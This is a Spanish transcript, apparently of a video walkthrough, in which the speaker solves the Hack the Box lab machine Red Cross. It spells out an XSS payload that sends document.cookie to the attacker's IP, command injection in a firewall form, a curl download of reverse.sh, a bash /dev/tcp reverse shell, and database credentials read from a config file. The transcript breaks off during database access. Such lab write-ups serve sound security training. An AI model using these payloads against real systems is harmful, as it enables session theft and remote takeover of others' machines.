¡Hola a todos! Bienvenidos a Rincu. Hoy vamos a ver la resolución de la máquina Red Cross de Hack the Box, que forma parte de mi preparación para el FFT versión 2. Si quieres ver los recursos con los que me estoy preparando, te dejo por aquí un vídeo. Bien, para comenzar estamos en mi directorio de Hack the Box. Vamos a crear una carpeta que se llame Red Cross, como el nombre de la máquina, y vamos a hacer un CD para entrar dentro de la carpeta, ¿vale? Por un lado, nuestra IP de la VPN de Hack the Box sería esta, la acabada en 28, y la IP de nuestra máquina víctima sería la 113. La tenemos aquí para siempre tenerla a mano y que no se nos olvide. Ok, vamos a limpiar la pantalla. Vamos a limpiar la pantalla. Así que como siempre empezamos con un nmap, vamos a hacer sudo nmap, menos p menos, porque quiero hacer un escaneo a todos los puertos, ¿vale? Quiero hacer un escaneo rápido, así que vamos a hacer SS para evitar hacer el three-way handshake, ¿vale? Que sea más rápido. Hacemos un escaneo con paquetes no más lentos que 5.000 por segundo, en el que estamos indicando que todas las peticiones que se hagan, que no sean más lentas de 5.000 paquetes por segundo, ¿vale? Y ahora quiero que me muestre los puertos abiertos. No quiero que me muestre puertos filtrados, no quiero que me muestre puertos cerrados, quiero que únicamente me muestre puertos abiertos, y además que me los muestres por pantalla, ¿vale? Con el triple verbose, y quiero que no me hagas el discovery, que no me hagas el ping, ¿vale? Y así reducir al máximo el tiempo. Ahora ponemos la IP de la máquina víctima, que en este caso es la 10.10.113, y quiero que me guardes el resultado en formato grepeable, para que sea compacto, en el archivo port-red-cross, ¿vale? .txt. Entonces ahora le damos a Enter, ponemos la contraseña, y ya nos dice que tenemos el puerto 80, el puerto 443, y el puerto 22. Para empezar, por el puerto 22 no creo que sea, porque no tenemos credenciales válidas, entonces solamente podríamos hacer un ataque de fuerza bruta, y luego por otro lado, la intrusión seguramente será por el puerto 80 o por el puerto 443. Mientras esto termina, vamos a abrir otra pestaña aquí, ¿vale? Vamos a darle aquí. Ahora, ya la tenemos por aquí. Y aquí vamos a hacer un Wattweb de la IP. 113. ¿Vale? Me ha faltado ahí un 10. Perfecto. Mientras se hace este Wattweb, vamos a hacer un escaneo con nmap de los puertos para ver la versión de que corren en esos puertos, ¿vale? Entonces vamos a hacer un sudo nmap-p, en el que le quiero indicar que el puerto 80, el puerto 22 y el puerto 443, quiero que me hagas, vamos a ponerlo aquí mejor, más atrás, un escaneo de servicios y versiones para los puertos que le acabamos de dar. ¿Vale? Y quiero que me lo haga al IP 10.10.10.113 y que guarde el resultado en formato nmap, es decir, tal cual me lo muestra por pantalla, por el archivo scan.redcross.txt. Le vamos a dar a enter y mientras esto se acaba, vamos a volver al Wattweb, ¿vale? Que lo tenemos por aquí y lo primero que vemos es que se está aplicando una redirección. Vemos que hay una redirección 301 que es una redirección permanente y se redirige desde la IP hasta el dominio intra.redcross.htb. Y podemos llegar a este dominio porque si nos vamos a el archivo etc.host, ¿vale? Tenemos aquí la IP con el dominio. Lo que va a hacer es que cuando nosotros entremos al dominio, el dominio va a redirigir o va a saber que a la IP a la que le estoy mandando, a la que quiero que me muestre la información, es a la IP acabada en 113. ¿Vale? Entonces de esta manera podemos hacer esa resolución. Entonces ahora podríamos entrar a Firefox, ¿vale? Vamos a entrar por aquí y podemos ir a la 10.10.113 que nos va a redirigir a intra.redcross.htb. En este caso nos muestra un panel de login, ¿vale? En el que nos muestra un usuario y una contraseña, pero antes vamos a volver a nmap para ver qué nos dice el reporte, el escaneo, ¿vale? Por un lado tenemos el puerto 22 que no nos interesa, tenemos el puerto 80 que ya nos detecta la redirección, ¿vale? Que ya hemos añadido al ITC host para que se haga la resolución. Nos dice que el 443 nos encuentra el certificado, que está autofirmado por intra.redcross.htb y también nos encuentra el recurso de interrogación page igual a login, que es el login que hemos visto antes. Y algo interesante es que nos muestra que las cookies, ¿vale? El PHP exit no está activado, por lo tanto quizás podríamos hacer un XSS, ¿vale? Un ataque de XSS y quizás obtener la cookie de sesión de un usuario con más permisos que nosotros o los permisos de administrador para poder utilizar la aplicación con permisos privilegiados, ¿vale? En este caso vamos a empezar con la web que la tenemos por aquí y vamos a navegar un poco por ella. Entonces vamos a probar el login, ¿vale? Vamos a poner por ejemplo aquí admin, admin, ¿qué ocurre? Y nos dice que la información ha sido errónea, ¿vale? Por lo tanto no funciona esa combinación. Si ponemos por ejemplo admin123, admin123, ¿vale? Nos dice que la información es errónea. Si por ejemplo ponemos root, root, nos dice que la información es errónea, ¿vale? Es decir que no probamos con las combinaciones básicas. No podemos acceder, pero algo que me lleva la atención es que por ejemplo si accedemos otra vez con cualquier usuario, por ejemplo root, root, vemos que aquí nos lleva a pageaction.php y aquí pasa algo y como no lo valida, parece que no valida la información, nos vuelve atrás. Entonces quizás en ese archivo si podemos acceder a él pues está ejecutando algo para que validar si ese usuario y esa contraseña son válidas. Entonces, ¿qué podemos hacer ahora? Pues seguir investigando un poco para ver por dónde podemos entrar, ¿no? Un poco. Aquí vemos un formulario de contactos y hacemos aquí, si vamos a enter y aquí escribimos por ejemplo admin, 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 contact. Nos dice que se ha enviado el contacto, o sea, se ha enviado el formulario. Si ponemos por ejemplo, vamos a probar a ver si es inyectable a HTML. Sería así. Hola. En principio no debería porque no se está mostrando en ningún lado esta información, pero bueno, nunca está de más probar. Vale, aquí nos está diciendo que estamos probando algo raro y que lo detecta, por lo menos por esa parte parece que está sanitizada. Vale, no voy a probar más por aquí. Voy a ver por aquí login. Tampoco funciona este botón. Vale. Así que tras unas pruebas hemos visto que no hemos podido obtener nada, así que ahora lo que nos queda es hacer footing a los directorios o footing a los subdominios, ¿vale? Para ver si hay otros subdominios que pueda contemplar redcross.htb. Hemos visto el intras y que puede ser que quizás haya alguno o también directorios que haya en el dominio en el que quizás haya información con credenciales por defecto. Así que nos vamos a ir a nuestra terminal. Esto lo vamos a cerrar. Esto lo vamos a cerrar. Bueno, eso no hace falta, pero aquí vamos a volver a nuestra carpeta. Y ahora para empezar vamos a buscar directorios. Vamos a hacerlo con GoBuster y vamos a hacer GoBuster en el modo dir que es para buscar directorios y en el que le voy a indicar una URL. Esta URL será la de intra.redcross.htb. Con el diccionario, el de siempre, de Seclist, UserShare, WordList, Seclist, Discovery, si no me equivoco. No, Discovery es para subdominios, WordList. ¿Dónde estamos? Por aquí. Creo que está en DirBuster. Y aquí está el directory list medio, ¿vale? Este de aquí, ¿vale? Le vamos a dar a Enter, pero antes le vamos a meter el atributo menos K porque estamos utilizando SSL. Entonces cuando utilizamos SSL tenemos que poner el atributo menos K y quiero hacerlo en 40 hilos, ¿vale? 40 hilos por segundo para que no se demore tanto tiempo. Le vamos a dar a Enter y mientras esto se hace, vemos que ya encuentra imágenes, documentación, vemos diferentes directorios. Así que luego iremos a por eso. Y luego vamos a abrir otra pestaña, otra pestaña, otra terminal, ¿vale? Y vamos a hacer fuzzing a los directorios, ¿vale? ¿Por qué a los directorios? Perdón, a los directorios, no, a los subdominios. Porque también me interesa ver si hay algún subdominio que podamos utilizar para continuar en este TTF, ¿no? Siempre hay que ir probando. La enumeración es lo más importante. Así que vamos a continuar. Y en este caso lo vamos a hacer con WFUD, ¿vale? Es otra herramienta para hacer fuzzing. A mí WFUD la verdad que me gusta bastante porque puedes hacer ataques de fuerza bruta y puedes hacer un montón de... Tienes un montón de posibilidades, ¿vale? Así que vamos a utilizar WFUD para utilizar otras herramientas. Hacemos WFUD. Lo quiero hacer en el modo colorizado, ¿vale? Entonces en el menos C. Con el atributo menos H le indico la cabecera, si no me equivoco, en el que es cabecera separado con las dos comillas. Aquí le indico el host, ¿vale? Y el host va a ser fuz. Ahora explico esto. Redcross.htb. El fuz va a indicar que ahí donde pone la palabra fuz va a ser intercambiada por palabras que haya dentro del diccionario. Entonces esto va a ser lo que quiero que me busque, ¿vale? Tengo que indicarle una URL, que esa URL va a ser pues redcross.htb, ¿vale? Ahora quiero, pues tengo que indicar el diccionario. Entonces el diccionario es el de Discovery que hemos casi ejecutado antes. Entonces user share, wordlist, seglist, discovery, ¿no? Seglist, seglist, discovery, DNS. Y ahora se es subdomain, ¿no? Subdomain to million. Y vamos a poner el de 5.000. Yo creo que sería, es más que suficiente. Vale, entonces ahora le vamos a dar a Enter y en principio esto va a estar cargando. Ahora nos vamos a ir al GoBuster, que mientras hace el GoBuster, esto me ha dado error. ¿Qué error me ha dado? Vale, me dice que no puede resolver el host redcross. Vale. En este caso no le indicamos el dominio, sino que le indicamos la IP. ¿Vale? Vamos a indicar la IP. 10, 10, 113. ¿Vale? Vamos a darle a Enter. Vale, efectivamente aquí ya está buscando. Y me encuentran muchos con 28 caracteres, con 28 palabras, perdón. Entonces vamos a cerrarlo para filtrar un poco más. ¿Vale? Vamos a hacer el mismo comando. Pero aquí le vamos a indicar doble guión, HW, en el que quiero que me esconda los resultados que tenga las palabras o 28 palabras. ¿Vale? Creo que es así. Entonces le vamos a dar a Enter. Y efectivamente los que tenga 28 no me lo va a mostrar. Me muestra uno de 18, me muestra diferente. Mira, ya he encontrado uno que es admin. Pero bueno, mientras tanto, mientras hace la búsqueda porque se encuentra algo más, vamos a irnos aquí al GoBuster. ¿Vale? Vamos a terminar esto. Nos ha encontrado imágenes, pages, documentación y JavaScript. Entonces vamos a irnos. Mira, también encuentra un server status, pero da un error 403, que es forbidden. O sea que no tenemos permisos para entrar. Pero vamos a entrar, por ejemplo, aquí a documentación. Documentation. ¿Vale? También nos da un error forbidden. Images. ¿Vale? El otro era Javascript. Javascript. Vale, pero no podemos acceder a ellos. ¿Qué es lo que podemos hacer o qué es lo que se me ocurre hacer? Vemos un directorio, o sea, documentación. ¿Qué puede haber dentro del directorio de documentación? Pues quizás haya archivos o haya documentación, ¿no? Que se pueda almacenar ahí y que podamos acceder a ella. Porque me dice que no tenemos permisos para acceder a este recurso. Pero quizás sí tengamos permisos para acceder a lo que son los recursos que hay dentro de este directorio, ¿no? Por ejemplo, un .pdf, un .html, un .php. Pues vamos a probarlo, ¿vale? Entonces, aquí voy a limpiar la consola. Voy a poner otra vez el GoBuster en funcionamiento. Y vamos a cambiar la URL por un lado. Vamos a probar con documentación, que yo creo que ahí puede haber algo interesante. Documentation, ¿vale? Y aquí quiero indicarle "-x", porque le estamos indicando la extensión que quiero que busque. Y va a buscar txt, php. Como hay un archivo JavaScript, pues un directorio JavaScript, pues quizás haya un js, ¿vale? Vamos a buscar también HTML, pdf. Vamos a seguir con la K, porque estamos en un HTTPS. Y en vez de ponerlo en 40 hilos, vamos a bajarlo un poco. Porque quizás 40 hilos sea demasiado para buscar tantos archivos. Y no quiero que me dé falsos positivos, quiero que me dé información correcta. Entonces, vamos a darle a Enter, ¿vale? Y mira, me encuentra un .php, un .html, .pdf, pero tampoco tenemos acceso en principio. ¿Vale? Vamos a seguir, vamos a esperar que siga buscando. Mientras tanto, nos vamos a ufuz, que lo tenemos aquí. Tenemos el directorio admin. Entonces, vamos a añadir el directorio admin al etc host. Así que nos vamos a sudo nano etc host. Y junto al de intra, vamos a añadir admin.redcross.htb. Lo guardamos, ¿vale? Y si ahora hacemos un ping a admin.redcross.htb, tenemos conexión. Así que nos vamos a Firefox. Y mientras tanto, esto lo vamos a dejar porque quizás lo necesitamos para después. Esto lo quitamos, htb. ¿Vale? Y aquí vamos a poner admin. ¿Vale? Como es autofirmado el DSSR, podemos aceptarlo sin problemas y podemos bypasearlo. ¿Ok? ¿Vale? Y tenemos un panel de administración en el que pone que es la versión de un web admin system 0.9. Quizás haya vulnerabilidades para este servicio si es conocido. La verdad que no lo conozco. Si por ejemplo le doy control, control u. View page source. A ver. Mira, tenemos ya un directorio que es images, ¿vale? Pero en principio no veo nada. Password, type password, name pass. En principio no veo nada. Así que vamos a probar. A ver. Admin, admin. ¿Vale? Esto es igual. Me dice la misma información que me comentaba antes. Root, root. Tampoco. Vale, así que necesitamos unas credenciales, pero parece que la información se valida igual que en el intra.redcross.htb. Si por ejemplo hacemos admin, vemos aquí que aparece page barra actions punto php. Entonces quizás esa página tenga algo que ver. ¿Vale? Vamos a volver aquí a ver si nos encuentra otro archivo, pero parece que no nos encuentra ningún archivo. Vamos a ir accediendo al punto html punto pdf, ¿vale? A ver si podemos acceder a ello. Punto html punto pdf. Tampoco. Y punto php tampoco. Vale, quiero filtrarlo. Creo que le he metido demasiados campos y hago punto php. ¿Vale? Vamos a buscarlo así. No, php no. Quiero buscar un pdf. Y voy a subir los hilos. Voy a subir los hilos porque al solamente buscar un archivo las combinaciones son menores. Así que vamos a darle a 50 hilos y vamos a esperar. Bien, ya ha acabado el escaneo de los archivos y nos encuentra un archivo que se llama account guión signa punto pdf. Vale, entonces tenemos como código de estatus 200, es decir, que podemos verlo. Vemos que el tamaño del archivo es de 2600 caracteres, creo, o de bytes. Realmente no sé muy bien cómo lo almacena. Entonces vamos a coger esta dirección. Nos vamos a ir aquí. Y entonces después de documentation vamos a pegarlo. Vamos a quitar la doble barra. Le vamos a dar a enter y vemos un pdf efectivamente y nos dice acceso a la intranet. Por favor envía un mensaje utilizando nuestro formulario de contacto, el que hemos visto antes que daba error. ¿Vale? Y nos dice que utilicemos ese formulario de contacto para crear un usuario utilizando la cadena username igual al usuario que nosotros queremos. Si seguimos hacia abajo vemos un nombre que pone Penélope Harris del departamento de IT. Entonces puede ser que Penélope sea un posible usuario dentro de este equipo. Así que efectivamente necesitamos credenciales para entrar tanto a intra.redcross.htb, que tenemos que verlo, y admin.redcross.htb. ¿Cómo lo vamos a hacer? Pues teniendo en cuenta, vamos a volver a nuestra terminal, vamos a cerrar esto, vamos a limpiar la pantalla y vamos a catear nuestro escaneo de Nmap. ¿Vale? Vemos que el php exit está desactivado, es decir que podríamos hacer xss. Podemos llegar a entender que estando por ejemplo en un entorno real hay personas dentro de la empresa que hacen diferentes ejecuciones. Teniendo en cuenta que el php exit está desactivado, quizás podemos hacer xss y mostrar la cookie de sesión del usuario para intentar loggearnos como un usuario con permisos y poder loggearnos dentro. Entonces vamos a ir otra vez aquí. Vamos a entrar aquí dentro. Y entonces aquí vamos a indicar una petición que sería la request. Lo puedo dejar así, no me importa, y voy a poner username, username igual a rinku, y entiendo que en el contacto es donde se puede inyectar el payload, ¿vale? Hemos visto que hemos intentado inyectar con html injection, así que vamos a probar con xss, ya que si nos vamos, ¿vale? Si nos vamos a, aquí nos vamos a storage, podemos ver que tenemos el php exit con la cookie y también vemos por aquí, vemos que el http only está desactivado, por lo tanto podemos hacer xss o podríamos hacer xss, ¿vale? Así que vamos a hacer esa prueba, request, esto lo quitamos, username igual a rinku, y aquí vamos a hacer script, script, new, vale, esto junto, new image, paréntesis, punto src, en el que el source, o sea, de donde quiero que coja el archivo, o el archivo o la petición, quiero que me haga http, mi ip, la 10.10.1428, por el puerto, pues por ejemplo, 8080, ¿vale? Que es donde voy a estar mi puerto con python3 para recibir esa comunicación, y quiero, pues que me dé la cookie.php, ¿vale? Ahora aquí es interrogante, c igual a, c igual en el que c indica la cookie, y ahora ponemos document.cookie, punto y coma, y cerramos la secuencia. Ya vamos a copiarlo por si acaso lo he escrito mal, le vamos a dar a contact, ¿vale? Vale, a contact no, tengo que estar en escucha aquí, sudo, vale. A ver, vamos a cerrar esto, vamos a poner sudo python3.mhttp.server por el puerto 8080. Vale, entonces yo voy a estar aquí en escucha por el puerto 8080, y desde aquí voy a volver a probar su request, aquí username, igual a rincu, y aquí pego esto, en el que le indico que es el document.cookie, punto php, ¿vale? Entonces le doy a contact, ¿vale? Se envía el contacto, si ahora vuelvo aquí, vale, no me está llegando ninguna petición, eso es porque seguramente haya escrito mal el payload, ¿vale? Aquí username, igual a rincu, aquí pegamos esto, y lo que me ha faltado aquí es el más para que me añada la cookie de sesión. Entonces le doy ahora a contact, se envía la petición, y aquí debería de recibir la cookie de sesión. Efectivamente, aquí tenemos la cookie de sesión, ¿vale? La tenemos aquí, esta es la cookie, hasta el punto y coma, ¿vale? Y me dice que el dominio es admin, es decir, que admin se está logueando, o está intentando acceder, y nosotros hemos, a través de un xss, hemos recibido la cookie de sesión. Entonces si ahora nosotros nos copiamos esto, hasta aquí, copiamos, nos vamos a Firefox, hacemos inspeccionar, ¿vale? Y ahora aquí nos vamos a storage. Entonces aquí ahora modifico esto, pego la sesión, o sea, pego la cookie, ¿vale? Y en principio, si yo recargo, ¿qué pasará? Que estamos como admin, ¿vale? Entonces estamos como admin, tenemos la cookie de sesión de admin, pero me da error, ¿vale? Me está dando error, pero bueno, con esta cookie de sesión vamos a intentar acceder a este admin, ¿por qué? Porque si hacemos otra vez clic derecho y nos vamos a inspeccionar, ¿vale? Y nos vamos a storage, vemos que la cookie de sesión se repite. Entonces vemos también que está el HTTP only desactivado, por lo tanto podríamos coger aquí, pegar la sesión, darle a enter, recargar, y ya estaríamos dentro del sistema. Bueno, y vemos dos aplicaciones, ¿vale? Entonces hemos accedido al panel de administración gracias a la cookie de sesión del usuario admin. Entonces por lo tanto tenemos dos aplicaciones, administración de usuarios y acceso a la red, ¿vale? Vamos a probar a administración de usuarios, ¿vale? Vamos a darle aquí. Y podemos añadir un usuario virtual, entiendo. Entonces si hacemos por ejemplo aquí Rinku y añadimos usuario, ¿vale? Nos dice que estas son las credenciales para este usuario, Rinku, dos puntos y nuestro usuario. Vale, entonces vamos a irnos aquí, vamos a cerrar esto, vamos a añadir estas credenciales a un archivo. Aquí vamos a quitar esto, quitamos los espacios. Vale, posible credenciales.txt y ahora vamos a intentar entrar SSH ya que tenemos unas posibles credenciales. Si entramos como SSH Rinku arroba 10.10.10.113 que es la IP, le doy a enter, le doy a yes. En principio el usuario está ahora mismo creado. Esto lo pegamos, le damos a enter y estamos dentro, parece, si le damos a un ifconfig, no tenemos ifconfig, ipa, ipa, tampoco tenemos ip. Donde estamos, estamos en el directorio raíz, ls, esto lo vemos esto, si hacemos id, vale, esto no, id, id, estamos en el grupo 1100 y 2020 que es el mismo grupo que aparece aquí, ¿vale? Si hacemos por ejemplo un lsb-release-a, tampoco lo tenemos, tampoco, help, vale, aquí tenemos los comandos que podemos utilizar en principio. Si hacemos un history, vale, vemos nuestros comandos. A ver si hay algo interesante que podamos ejecutar nosotros. Si hacemos un sudo su, no podemos utilizar sudo, tiene sentido. Y un ls, si hacemos un cd-a-home, ls, vale, aquí siempre tenemos diferentes usuarios, cd-public-ls-cat-src, vale, cd-src-ls-cat-ip-tc-tl.c. Vale, ¿qué es esto? Este archivo. Vale, pues lo que parece que esto se está aplicando con iptables, vemos que es iptables y posiblemente tenga algo que ver con el acceso a la red que hemos visto anteriormente en la aplicación, ¿vale? Vamos a entrar en interface-data, a ver qué hay. No hay nada, ls-l. Nada. Vale, pues en principio aquí no podemos hacer mucho más, ¿vale? Estamos como en una jaula o en un contenedor o algo. Route-n, tampoco. Vale, entonces tenemos usuario pero no podemos hacer nada porque no tenemos permisos para hacer nada, ¿vale? Solamente estamos en los grupos de asociados que nos dice el propio programa. Entonces si nos volvemos otra vez a la aplicación, ¿vale? Esto voy a darle hacia atrás. Vale, tenemos este usuario creado, ¿vale? Me vuelvo hacia atrás. Voy a ver aquí Network Access. Si yo, por ejemplo, me doy acceso a mi IP que sería la 10.10.14.28, voy a interceptar esta petición por WorkSuite porque me interesa qué es lo que se está ejecutando en esta petición, ¿vale? Entonces aquí vamos a ir a Control-Shift-B que es mi atajo para abrir WorkSuite, ¿ok? Mientras tanto nosotros activamos el FoxyProxy, ¿vale? Esto le damos a Close, Next, StartBurb y esto nos lo llevamos a la página 3, ¿vale? Para esto nos lo llevamos a la página 3, ahora sí. Ya lo tenemos aquí, nos vamos al Proxy, está en modo Interceptar. Esto está activado, entonces si le doy a Allow IP, ¿vale? Tengo que permitir el certificado. Aceptar, ¿vale? En principio ya está. Vale, aquí tenemos la petición. Fijaros que me pone IP, mi IP, y la acción Allow IP. Eso quiere decir que está permitiendo mi IP. Ok, entonces vamos a permitirlo, vamos a darle a Forward, ¿vale? Se permite la IP. Me vuelvo aquí y me dice, todos los, la verificación pasada, se añade o se garantiza acceso a la IP 10.10.14.28. Es decir que nos ha dado permiso o acceso a algo. ¿Qué podemos hacer ahora? Pues ahora lo que podemos hacer es, por un lado, vamos a desactivar el WorkSuite, ¿vale? Lo desactivamos, nos vamos aquí, y aquí voy a hacer otro escaneo a la IP. ¿Por qué? Porque como tenemos acceso a algo, quizás ahora con IP Tables tenemos acceso a más servicios o a otra parte de la red. Así que vamos a hacer sudo nmap-p- todos los puertos abiertos y hacer un reconocimiento de servicios y versiones a los que encuentre, ¿vale? Voy a hacerlo así rápido y quiero hacerlo a la IP 10.10.10.113 y quiero que me guarde el resultado en formato nmap por scan iptables, por ejemplo, redcross.txt. Le vamos a dar a Enter, vale, la S es minúscula. Le vamos a dar a Enter, vale, he optado por cancelar porque la verdad que estaba tardando bastante, creo que me he venido arriba con este escaneo así de golpe. Así que vamos a hacer todos los puertos abiertos, ¿vale? Y quiero que me haga un triple verbose y que no me haga resolución DNS y también voy a meterle un "-ss", ¿vale? Para que se haga más rápido, ¿vale? Y fijaros que me encuentra otros servicios, me encuentra el puerto 21 que está el FTP y el puerto 1025 que no sé realmente qué servicio está, ¿vale? Pero esto lo podemos cancelar realmente y ahora lo que vamos a hacer es, para estos puertos, quiero que me analice el 21 y el 1025, ¿vale? Y aquí pues quiero hacer un scv. Le voy a dar a Enter, ahora sí, me analiza solamente estos dos puertos, el escaneo se va a hacer más rápido, que antes se estaba demorando bastante, la verdad. Mientras haces el escaneo, la verdad que va bastante lento, si le echamos un ojo al código, vemos que el código de arriba del que estaba en la máquina, el que se llamaba IPTCL o algo así, vemos que es lo que se está ejecutando en las IPTables, ¿vale? Vemos aquí los argumentos, digamos que si eligen 0, se abre IPTables, se hace una acción, se hace un input, se añade a todos, la verdad que no sé mucho de IPTables, pero más o menos puedo entenderlo. Y aquí vemos la acción, ¿no? Aquí vemos la acción, si el argumento es diferente a 3 y a 2, lo que hace es permitir la IP en el argumento 0 abriendo IPTables, entiendo aquí por qué IPTables está aquí. Y se añade la acción que es la número 1. Entonces, con este código, lo que se está haciendo es añadir las IPs que ponemos en el programa. Lo que sí veo en el código es que es un código bastante simple y que quizás podamos interceptarlo o quizás podremos inyectar comandos, ¿vale? Para ver qué podemos ejecutar, ¿vale? Vamos a ver si esto ha acabado. Vale, esto ha acabado ya. Y por un lado vemos que tenemos la versión VSFTP de 2.08 del puerto FTP y vemos un puerto 1025 que es NFS o IIS, es decir, que no lo detecta del todo. Así que puede ser que quizás podamos utilizar el puerto FTP o que podamos utilizar la inyección que he comentado antes, ¿vale? Así que vamos a probar. FTP no puedo acceder, ¿verdad? No, no puedo acceder porque no tengo FTP. Vale, pues vamos a probar esa inyección y si veo que no, pues ya tengo que, ya instalo FTP, ¿vale? Pero tengo que actualizar el sistema y esto puede demorarse demasiado. Así que vamos a irnos a Firefox otra vez, ¿vale? Esto nos vamos a ir para atrás. ¿Ves? De hecho, accede al Firewall, creo que es la página del programa. Vale, aquí no quiero, ah, sí, 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 es aquí. Network Access, vale, vamos a poner nuestro IP. 10.10.14.28, ¿vale? Podemos denegarla o permitirla y en este caso voy a activar otra vez el Burp Suite, ¿vale? Se ha salido, ¿vale? Ahora me voy al Burp Suite. Permito la comunicación. Permito, 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 permito todo. Network Access. Permito la comunicación. Vale, aquí pongo mi IP otra vez. 10.14.28. Con Burp Suite activado le voy a dar a Allow IP. Y aquí lo que me llama la atención es que simplemente se añade una IP y una acción. Se añade o Allow IP o Deny IP. Entonces, si yo esto lo llevo al repeater, y esto aquí puede ser, si yo se ejecuta la IP pero luego hago un ID, ¿qué pasa? Send. Vale, me dice que es inválido si lo pongo todo junto. Vale, me dice que es inválido también. Vale, veo que aquí no puedo ejecutar nada, así que vamos a probar la otra opción que sería... Aquí voy a darle a... Bueno, esta no. Por ejemplo, 1, 1, 1, 1, 1, 1. Allow IP. Me voy otra vez al Burp Suite. Permito, permito. Vale, se envía aquí y le envío a Send. Me dice que el formato de la IP no es correcta. Pero vamos a cambiar la acción. Vamos a poner Deny. Vale, y me muestra el archivo que hemos visto antes en la consola. Si aquí, por ejemplo, intercepto la petición y le digo, vale, muéstrame los grupos. Vale, tenemos ejecución remota de comandos. Vamos a ver si podemos acceder a nuestra máquina. Entonces nos vamos aquí. Vamos a limpiar esto. Vamos a hacer un sudo Python 3 por el puerto sin el puerto. O sea, puerto Chintasi. Vale, esto está en escucha. Entonces yo me vuelvo otra vez al Burp Suite. Aquí le quiero indicar un curl HTTP 2.10.10.14, perdón. 14.28. Vale. Y en principio esto lo tengo que URL encodear porque si no me va a dar error. Porque veo que ha cambiado el formato del color. Entonces puedo entender que ya me va a dar error. Y URL encode, URL encode. Vale. Entonces si ahora hago Send. Vale. Fijaros que aquí lo que me sale en respuesta, vale, si lo he URL encodeado, efectivamente tenemos la comunicación por aquí. Entonces, ¿qué es lo que podemos hacer ahora? Si ahora aquí tenemos un recurso que sería una reverse shell en el que podemos ejecutarlo, podríamos ejecutar comandos. Perdón. Podríamos tener una reverse shell dentro de la máquina, ¿no? Entonces, lo que vamos a hacer es esto. Lo cerramos. Aquí lo que vamos a hacer es crear un sudo nano reverse.sh. Vale. Y aquí lo que vamos a hacer es barra BIM barra BASH. Y vamos a hacer un sh menos i mayor que ampersand barra dep barra tcp mi ip 10.10.14.28 por el puerto 443 que voy a estar en escucha. Y ahora hago un 0 mayor que ampersand 1, ¿vale? Y esto lo guardo aquí. Y ahora me vuelvo a poner en el puerto reverse, perdón, esto no, me vuelvo a poner con el servidor Python. Me vuelvo a Bursuit, ¿vale? Y aquí esto lo vamos a borrar y vamos a hacer curl http 2 puntos barra barra 10.10.10.1428. 1428 barra, no, 2, barra reverse.sh. Y quiero que el output, que es donde me guarde el archivo, quiero que me lo guarde, si no me equivoco, puede ser que en tmp esté el archivo, ¿no? Que esté este directorio, el directorio temporal. Y quiero que me guarde como reverse.sh. O mejor, si hago así y ahora concateno esto, así, así, a ver si quiero escribir, bash y esto lo clic derecho, url, url encode, ¿vale? Esto por un lado aquí, me vuelvo aquí y aquí hago un sudo, sudo nc menos nlvp por el puerto 443, ¿vale? Ya estamos aquí en el 4443, entonces si todo está bien, la aplicación web coge el reverse shell y lo ejecuta con bash, ¿vale? Entonces si no me equivoco, si le damos otra vez a send, ¿vale? Esto está en espera. Y efectivamente aquí tenemos la reverse shell, si hacemos un ls, perfecto, si hacemos un ifconfig, perfectos, huamai, no tenemos ifconfig, ¿vale? Huamai somos www.data, si hacemos un ipa, ¿vale? Estamos en la 10.10.10.130, es decir, que ya estamos en la máquina del usuario. Entonces vamos a hacer un cat a uno de los archivos que tenemos ahí. A mí algo que me llamó la atención al principio es el archivo actions.php, en el que validaba toda la comunicación y veía si un usuario o una contraseña estaban, eran correctas y por lo tanto lo validaba, entiendo que con una base de datos. También puedo entender que esa base de datos es el servicio que estaba en el 1025, ¿vale? De hecho voy a ver si el servicio 1025 es un servicio común, ¿vale? Puerto 1025, vale, no es un puerto utilizado para algo, a ver, puerto 25, base de datos, a ver si por casualidad tiene algo que ver con la base de datos. Vale, esto es lo que me aparecía en enemap, que era nfs o iss, pero parece que no me aparece nada más. Vale, pues de todas formas vamos a ver ese archivo, ¿vale? Vamos a ir otra vez a la terminal y entonces vamos a hacer un cat de actions.php. Le damos a enter, ¿vale? Y aquí vemos, vale, voy a cerrar esto, voy a cerrar esta pestaña de aquí. Sí, y así lo vamos a hacer todo más grande, ¿vale? Y efectivamente esto es una base de datos, ¿vale? Aquí vemos dvname. Mira, fíjate, pone dvname, red cross, username, www, que es el usuario como el que estamos logueados, si no me equivoco, y password a xwrt. Y también fijaros que también se está utilizando esto en el firewall, en el que está utilizando el programa IPT-CTL que hemos visto al principio, antes de entrar en esta reversión. Bien, entonces entiendo que esto es una base de datos, ¿vale? Y por lo que veo, creo que es una base de datos en Postgres. ¿Por qué? Porque Postgres utiliza normalmente el pg barra connect, pg barra execute. Entonces si por ejemplo para verificarlos, vamos aquí a Google, y pongo pg barra connect, base de datos. Otra vez, no quiero Google. Bueno, mira, ya automáticamente nos dice connect to Postgres database using PHP. Entonces ya nos está diciendo que es un Postgres SQL, ¿vale? Así que vamos a verificar si podemos acceder al Postgres SQL. Entiendo que a través del puerto 1027, o 1025 este que había, o también en vez de hacerlo desde fuera, podemos hacerlo desde aquí directamente porque vemos que está en el host 127. Entonces desde aquí entiendo que podemos acceder a este servicio. Entonces aquí voy a Postgres, si no me equivoco es PSQL, de Postgres SQL. El host va a ser el 127.0.0.1. La base de datos, pues mira, la base de datos quiero que sea, hemos visto aquí varias, hemos visto aquí la de firewall, entiendo, pero también vemos aquí la unix, unix-mrg y un password más complicado. Entiendo que, no es que entienda, sino que creo que es mejor hacerlo con el user porque ya estamos como www, entonces si hago aquí menos d, aquí unix, ¿vale? Menos d unix menos u, en el que u mayúscula indica el usuario que es unix-rmgr y le damos a enter el password, pues el password lo tenemos aquí. Creo que podía haber indicado password, lo tenemos aquí. Dime que sí. Vale, pues hay que lanzar otra vez la reversal porque parece ser que no me ha entrado. Así que vamos a entrar y vamos a hacer la TTI operativa porque si no nos va a dar problemas. Entonces ahora para tener una TTI operativa vamos a hacer script, script barra Tep barra nul menos c bash, ¿vale? Esto por un lado y ahora tenemos que hacer control Z, cancelamos la petición, ahora hacemos stti raw-eco-fg, enter, hacemos reset, reseteamos, quiero, ¿qué tipo de terminal quiero? Quiero una x-term, ¿vale? Que es la que tenemos nosotros en nuestro Kali, digamos, y ahora tenemos que hacer que term valga x-term. Entonces term para asegurarnos, x-term, ¿vale? Y export shell valga bash, ¿vale? Shell valga bash, ¿vale? Entonces, en principio ahora si yo limpio la consola y hago un ls, estoy aquí, si cateo un actions.php, ¿vale? Lo tengo aquí también, tenemos aquí las credenciales, lo primero que voy a hacer es copiármelas, ¿vale? Para no perderlas, ¿vale? Y aquí voy a cerrar esto, voy a hacer un echo, esto a postgres 